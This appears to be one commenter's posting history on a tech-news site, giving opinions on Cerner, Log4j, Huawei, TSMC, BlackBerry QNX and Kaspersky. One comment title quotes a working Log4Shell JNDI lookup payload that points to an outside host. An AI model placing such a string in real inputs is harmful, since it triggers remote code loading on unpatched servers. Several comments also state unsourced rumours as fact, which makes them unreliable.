* Posts by Happytodiscuss

19 publicly visible posts • joined 2 Dec 2018

Oracle closes $28.3b Cerner buy amid warnings of commercial challenges


Re: It will be interesting to see what Oracle/Cerner does with the VA VistA EHR replacement

I looked around VistA's system assisted by a company that wanted to add remote medicine, outside client intake, and outside billing to VistA years ago now, and have to agree that an Oracle - Cerner choice is a far removed second place from VistA.

One reason for staying with Cerner will be hospital board inertia and lack of technical familiarity (IT hospital board members are not doctors and therefore plebian) and functional knowledge (do doctors even understand how hospitals work) of VistA. Another reason to choose Cerner is the prestige of owning a system from Oracle (honestly that's the way some hospital executives think).

Hospital staff begrudgingly accept or happily embrace VistA for its comprehensive coverage of any hospital, not just the VA.

Its also more secure out of the box at least partly due to its architecture having been ported from a System 38 to MUMPS and C. VistA should be the hospital application that resides in the cloud and sold as a services to smaller, more vulnerable hospitals to hacking.

However, decision makers being doctors...

TSMC and China: Mutually assured destruction now measured in nanometers, not megatons


The problem remains, a broken contract

The PRC have spoken confidentially with the US requesting that the US recognize the Taiwan Straights by not sailing through the straights, effectively delivering up that body to becoming PRC waters. That's the quandry and its a no win one for anyone not living in PRC or subject to their sway.

Not travelling through the Taiwan Straights without PRC permissions seems like a simple thing not to do to avoid a conflict today. I always believed that CN would not attempt their re-uniting with Taiwan until the technology companies there, like TSMC, had shipped their 'technology' to the US or beyond.

That chipmaking production is so easily disrupted is reassuring. TSMC is only now ready to manufacture 6nm after having tested their manufacturing process for two years. Whether or not 6 nm is actually the 4 nm referred to in this article, the invention appears to be the easy part, and that manufacturing is extremely difficult to perfect in addition to being sensitive to very small control process deficiencies is also reassuring and creates a peril.

There is a time bridge that needs to be accommodated in the hawkish scenario, in order for everyone outside of China and their sphere, not to be taken backwards to sometime before the day CN crosses the straight chip wise. The article convinces me that CN will also suffer the same outcome as the ROW in this scenario.

The Dr. Strangelove -MAD scenario will become more likely the more social unrest occurs in CN. Honestly its a dilemma.

Leading up to the leadership conference in September in CN, it appears as if there are some in the PRC that are speaking real politick, and hence the confidential warning. While concealed from view, Xi's ambitions are not a done deal to accomplish.

Someone should develop a game based upon the stuff going on today, and get some new generation thought posted as game results, to help.

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching


Re: Little Bobby Tables' younger brother, Stephen ${jndi:ldap://p0w.nd/sploit}

Yea, the SQL injection vector, resulting from the 'don't change the default, shipping administrator password of MS-SQL Server and build your companies databases and websites using the instance', vulnerability, V 1.0. The good old days.

Now though the design, maintenance and support of Open Source libraries falls to 'zero paid' resources, there is no motivation or profit in oversight of methods for designing and executing backward compatibility, there is considerable difficulty tracing the use of Log4j use in applications other than Apache (and Apapche is very serious). Because LDAP is ubiquitous, from webservers to networks of embedded systems buried inside the dark recesses of planes, trains, and automobiles, good luck on updating those 'anonymous supply chains'.

I was looking over the shoulder of white hats using Security Focus's network of 18,000 log analyzers at the time of SQL Server vulnerability and original SQL injection exploit and watched it go global , like fire on dry tinder, in 24 hours in 2003. Whoa. Imagine what's happening with this vulnerability.

I can't imagine how fast and sophisticated the exploits of this vulnerability will be developed and propagated today.

Uncle Sam throws Huawei CFO a bone in her extradition fight, but deal will require an admission of wrongdoing


Re: The recent court procedings have been rather interesting.

' Key police witnesses are contradicting one another, with one police sergeant suddenly retaining his own lawyer and refusing to testify and another reversing the testimony given in her previous affidavit.'

The police sergeant who now works has head of security at a Chinese controlled Macau casino. Corruption possible? I would say yes.

Meanwhile back at home Huawei in RPC has created an arms length arrangement with it handset division, in order to continue to to sell their phones globally if not their switching equipment.

It needs to be resolved for all parties. Trump has caused significant damage to the extradition process objectively, and has cost Canada billions in exports through breahed contracts initiated by RPC, let alone imprisoning Spavor and Kovrig and holding them hostage.

This has opened the eyes of Canadians and should serve, as it does, as accumulating evidence of China bullying alongside RPC recent banning of AUS goods.

There are new trade realities in the world which are comprised of part fantasy, part marketing, and part America First. Spavor and Kovrig should be home in time to get their vaccines administered by local officials at the continuing pace.

On a related note Canada is examining RPC investment/purchases especially those that involve the Canadian Arctic, putting at least a delay in place for RPC Belt and Ice Road initiative.

Amazon’s cloudy Macs cost $25.99 a day. 77 days of usage would buy you your own Mac


Mac development support on AWS is for automotive console development testing?

In a related Reg article, (Whoa BlackBerry: Firm hooks up with AWS on cloud telematics platform for vehicle data) the news is BlackBerry QNX has been integrated into AWS using the IVY platform. QNX is generally regarded as the brain pan for the main control applications being developed for automotive. Like there may be an entertainment domain, a 'pilot' console, an ECU (combustion/engine/transmission control centre), LIDAR (navigation, collision avoidance), environmental domain, and an orchestrator and external communications domain.(QNX). The IVY platform is AWS resident and probably consists of something like pub-sub bits and pieces communicating with vehicles anywhere that use QNX as the host application

BlackBerry QNX is already hosted in about 175 million vehicles while Apple developed applications are found in far fewer than QNX can lay claim to, and probably far less than Android. Android is already supported within AWS. iOS being resident was the missing piece.

Just a thought, that while Apple hooking up with QNX on AWS is for certain not the only reason for Amazon's announcement, it could be one.

The tie that binds is Apple employee Dan Dodge hired about 2 years ago. He was the co-founder of QNX and probably wasn't hired by Apple for his Carnegie-Mellon smarts

Whoa BlackBerry: Firm hooks up with AWS on cloud telematics platform for vehicle data


You are being logged now, BlackBerry and AWS automate the digestion and calculation of options

It is a bald faced commercial play. OEMs will communicate data in stages and priorities that are set by the OEMs for digestion, calculation, and to offer advice now or in the form of design in the future. Close to real time, allowing more immediate decision making, personal or not, by the purchaser.

I watched the fireside chat video and it did sound like this platform will offer the increased ability to spy on your teenager. Kind of like OnStar does in combination with tracking devices or the untech savvy teen's phone.

The data from sensors and automotive control domains is being generated and stored now, and has been for awhile. Go for a bug fix and the OEM downloads it. Ask for a copy and you won't get it. Its the property of the OEM. They will say that it is like SAE data at least on this side of the pond, nothing personal.

There is no happy privacy story emerging from automotive and IoT data collection. At least with BlackBerry and QNX, Boris or other miscreants perched on dealership ledges will not get it without a BlackBerry cracking, Amazonian effort.

Yes, we have a 5G iPhone now. But that doesn't mean 5G has arrived


Re: Oh, how I wish!

Good ol Sasktel.

Saskatchewan is mineral and food rich and flat as a table top with only two curves in the main road transecting the province east to west (or west to east). They do their own thing and have had fiber backhaul in place waiting for the ROW to catch up for a while. As in Alberta there is lots of black fiber with access points planted according to some logic but at least follow the sectional lines when in the countryside. Waiting on 5G business case like the rest

Efficiently run operation Saskatchewan.

Whoa-o BlackBerry, bam-ba-lam: QWERTY phone had a child. 5G thing's newly styled


Now that we are used to jumbo iphones, how about a jumbo BB with keyboard

Still slogging away with my BB LE2 and rue that I may have to move to another manufacturer's phone when this one is done. Using an iPhone 11 for non-critical stuff, I am used to carrying one phone in my back pocket and the BB phone in my front pocket. The way phones are going, make the new BB phone larger and thicker, add the keyboard and a nice sized battery would work for me.

You're not getting Huawei that easily: Canadian judge rules CFO's extradition proceedings to US can continue


Huawei, our blessing and our curse

Extradition treaties like the one applied to Meng are rooted in law and embodied in the agreement. The fraud is penny ante. Which multi-national hasn't used reseller agreements to form a path to doing business in a forbidden market.

That said, China has suspended meaningful trade with Canada as the result of the Meng controversy while concurrently partnering with the National Research Council on a Covid vaccine manufacturing-delivery system. Huawei has used the NRC and SR&ED programs to perform research using Canadian universities and BB-Nortel developed expertise knowing that Canada does not have a precondition for the preservation of IP in Canada based in law, all while applying their wolf-warrior diplomacy against Canada.

Trumps politicizing of the Meng incident was the act of a non-politician however ignorant. Canada is reaching its point of 'no'. No to all mutuality that doesn't benefit all parties. Canada has already paid the price with China for Meng, so expect a compromise that says that Huawei can sell 4G but not 5G soon I hope. Every country in the world has this equipment somewhere in their infrastructure already, including the US.

The Meng ruling came out of an appeal to the BC Supreme Court, so there are still appeals remaining. Let's hope the Michaels are home before the PRC moves on Taiwan.

Cisco rations VPNs for staff as strain of 100,000+ home workers hits its network


Anxious to find out how Teams will work?

I recently watched a system admin set up Teams, over a three hour period, for my wife's work from home access. They did set it up remotely and they wanted to allow RPC in order to perform the set-up on the new ASUS high quality laptop (I7, 12 GB RAM, Win 10 professional). Tons of bandwidth. The set-up took three hours and required RPC to remain open even after completion.

How well is Teams integrated into MS infrastructure?

They who set it up are a service provider, and while they don't keep accurate records and do tend to knowledgeable, they seem to be able to make things work when required local or remotely, so there is that. My wife's firm is 40 people and use technology gingerly.

From a cold boot until the full version of Teams along with the Office 365 is loaded and ready takes about 10 minutes. Again we have lots of bandwidth, they appear to use some kind of Cisco switch (sorry I just realized they are using the Cisco VPN which is probably overworked right now and for the forseeable future) Is this the normal set-up and boot-up time you are seeing in your set-up?

I am being curious is all.

Nokia said to be considering sale or merger as profits tank


Re: I wonder about Ericsson-Nokia partnership

When I first heard Bill Barr hypothesize about supporting investment in Ericsson or Nokia, to counter Huawei, to build out the US 5G infrastructure, I immediately thought about Cisco. Back in the day it was Cisco that was America's most favored investment versus NORTEL so rightly or wrongly it forms part of US historical thinking on telecommunications.

Like NORTEL did, I would use someone like a Flextronics to build on Cisco's behalf at least in NA.


Re: Efficiency

I have heard described more efficient wireless backhaul which is a function of more robust antennas combined with Huawei's end-to-end component load distribution as being an advantage. If Huawei can resolve frequency hops quickly and ensure delivery of higher volumes whether in the low, mid or high frequency bands thereby increasing volumes and reducing latency, and transport backhaul for distance, this would effectively reduce the amount of equipment required.

This means less requirement for FDDI infrastructure which is a particular problem in Canada (distances (cost)), and the US (lack of investment in infrastructure, concentrated capital spend spread amongst 120 + or - telcos/providers). And of course a problem for less wealthy nations as well.

And lower capital costs.

Infor is now a Koch company: Megacorp swallows cloud ERP outfit after investing billions in early-stage funding


Koch, Infor, and the acquisition

Except for the fact Infor has a number of specialized applications such as those for Aerospace, Automotive, Process Industries, Project Industries, Configure and Quote, Microsoft is totally (not) their equivalent.

Cloud computing was a godsend for Infor because it alleviated and concealed some of the difficulties inherent in ERP premise implementations, reduced customization risk, and obfuscated differing code bases. Infor grew through aggregation of different specialized software for different industries developed by different specialized suppliers, and mainly those that were on the periphery of greatness at one time, like Baan for example.

I see this as a support revenue play with ancillary benefits accrued through Koch Industry adoption (home-cooking) of the software for their own businesses. Secondly, and for a short period of time (until their competitors that use Infor software migrate to other software), Koch having insight into their own and new industries and common practices of those companies they may wish to emulate viewed from the other side of the mirror.

Smart play especially as the US increases the Buy American mantra.

How to fool infosec wonks into pinning a cyber attack on China, Russia, Iran, whomever


Re: Don't we? Load the tubes we're going home boys

In retrospect its clear that the Lusitania was carrying arms to Liverpool. It is unclear that the u-boat captain knew about the arms.

It was clear, or at least the fog cleared on the last day of their time in the Irish Sea on that tour, and the Germans had been chasing other ships to sink when they came across the Lusitania, and fired the last of their torpedoes.

Happy as clams, the u-boat exited the Irish Sea back to their home port on that day. That captain was later killed themselves I think.

Arrogance, ignorance, and brutality to spare I would say, on both sides.

Bezos DDoS'd: Amazon Web Services' DNS systems knackered by hours-long cyber-attack


Well, there is the matter of Bezos versus Trump

I am not saying that the US participated in this DDoS but that The US DOD just chose (Thursday) Azure after a review of the original Amazon award supposedly initiated by the white house.

The idea of a state level actor affecting what we assume is the most durable and reliable Cloud service peopled by world class experts, does make one wonder about what the heck is going on, and if a Trump 'friend' is amplifying the big man's malevolent wishes for Bezos.

Yeah more of this stuff coming I'm afraid.

Headsup for those managing Windows 10 boxen: Microsoft has tweaked patching rules


Having studied the adaptation of the Class 7 and 8 diesel engine class to the phased in standards for diesel emission compliance defined by the EPA/CARB for American truck and engine manufacturers, I can say there was considerably more damage to the environment through cheats and exclusions over the duration of the American 13 and 15 liter engine program from 1998 until I completed my work in 2014 than ever caused by the VW group.

While none of the American engine makers or truck manufacturers attained the same level of duplicity for the same duration of time using the VW method, on a far greater number of liters of diesel fuel, their crimes were either made lesser through government complicity or greater through the allowance of misrepresentation (lying) and obfuscation. For many reasons VW was prosecuted but the crime to the environment was done by American manufacturers.

France wants in on the No Huawei Club while Canuck infosec bloke pretty insistent on ban


Re: Evidence of Five Eye arrest, now an Ozzie

Consider this your first Ozzie alert:


Question, whose router shoulders the bulk of filtering activity for the Chinese firewall?

Open up the Chinese firewall, open up their markets, and we'll open up our markets...how is that for a potential solution?

As for the Canadian sentenced to death. Let's say that it needs to be considered highly unusual that once sentenced to 15 years for a crime however despicable, that you are re-sentenced to death upon further consideration? Really? Not really kosher is it?

Huawei, Nortel...for Canadians its hard to tell the difference. Did you hear the story of how a top secret ministry of the Canadian Government was going to move into the abandoned offices of Nortel in Ottawa but scrapped the plan because they couldn't determine with absolute certainty that electronic listening devices weren't still broadcasting from within the actual concrete structure itself. It appears that Huawei may have applied their advanced knowledge of wireless backhaul to hauling back records of the daily work done within those buildings. Admittedly it could have been Cisco...let's say it was both.

Then there was the Chinese hack of the NRC...and Canada's 'chops' as a power in wireless.

Huawei’s elusive Mr Ren: We’re just a 'sesame seed' in a superpower spat


Hyperbolic Assertions and Criticisms Justified or Not?

I assert that none of us has an idea of the complete truth of the matter before us. The issue has become technical, cultural, political, historical (alright NORTEL had its intellectual property in the wireless to wired bidirectionality stolen by someone and maybe everyone), and commercial one.

We are a 'five-eye' that has just been threatened by China that our citizens (https://www.theglobeandmail.com/politics/article-canada-rebuffs-chinese-warnings-of-repercussions/) will be further punished if we don't allow Huawei to remain selling into our market. There are a number of individuals' fates held hostage to ensure that we understand the clear and present danger of not allowing Huawei to continue supplying into our market.

Question, is Microwave backhaul the real primary competitive advantage for Huawei in the 5 G wars? Our sparse spaces would provide discontinuities for any potential mesh design using Huawei if that is the case. Is Russia buying from Huawei?

Question, would the legacy university research ecosystem for Bell Northern, NORTEL and Blackberry provide advanced insight into the wireless/telecommunications domain even today? Huawei is spending a considerable amount of effort investing in our universities driving innovations and advancements, and because our research programs don't demand that IP ownership remain within our borders as a precondition for government research dollars, Huawei is using our gold for their benefit.

Question, from your perspective, would you vote that this 'five-eye' vote 'aye or nay' to allowing Huawei access to bidding on our network needs or should they be barred?

It's 'nyet' again, yet again, for Kaspersky: Appeal against US govt ban snubbed by Washington DC court


Kaspersky the AV engine in ZA Extreme Security poses a quandry

Having used Symantec and McAfee in the past, I settled on the paid edition of ZA. In reading the fine print (again recently) I see that ZA's Extreme Security edition does in fact use the Kaspersky AV system for AV.

Now I trust CheckPoint to be CheckPoint, and there is no doubt in my mind that some data is being harvested from the Firewall component of the package to bulk up its knowledge of the (un)known universe. I appreciate that I can articulate my inbound and outbound data preferences as I wish to control this flow because I am running layered firewalls.

I would (did) not buy Kaspersky because as it turned out I had three (former Soviet) Russian engineers working for my Internet company beginning in the early nineties through to 2000, and I trusted them to be Russian. This means take a tea break at 10 and 4, engineer for re-purposability (object oriented discipline), solve complicated problem with simple, effective solutions, and take 'their' source code with them each day. They were brilliant and well educated, and therefore above my paygrade to characterize them as being crooked and/or pro_russia. I recognize that I paid their wages and was entitled to keep the source code of applications they developed on the company's behalf, so I was taking a risk? I didn't buy Kaspersky was my response.

My company implemented CheckPont firewalls in the nineties.

However Kaspersky working alongside ZA and operating within their framework? I am still in shock a little bit (having just discovered this recently), perhaps denial, and haven't pulled the plug on ZA yet. Indecision is, the only times I have detected malcode on a machine under my purview, the computer (users) were running Symantec or McAfee and naturally not performing regular updates, practicing unsafe surfing, and using mickey mouse routers. Secondly, ZA paid service is obscure from the mainstream. Third, geopolitically speaking, I believe that there is sufficient mistrust between Israel and Russia and with the source residing within CheckPoint (and Kaspersky's commercial interests in financial survival) to defeat the massive trojan hypothetical that Kaspersky AV residing within CheckPoint's framework poses. Fourth, Russia expelled and exported a significant number of clever, motivated (Soviet educated) engineers to Israel in the early 90's sufficient to start an extremely successful software industry which included sufficient technical talent to control any bad actor.

I am going to keep my ZA for now.

Opinions on my approach?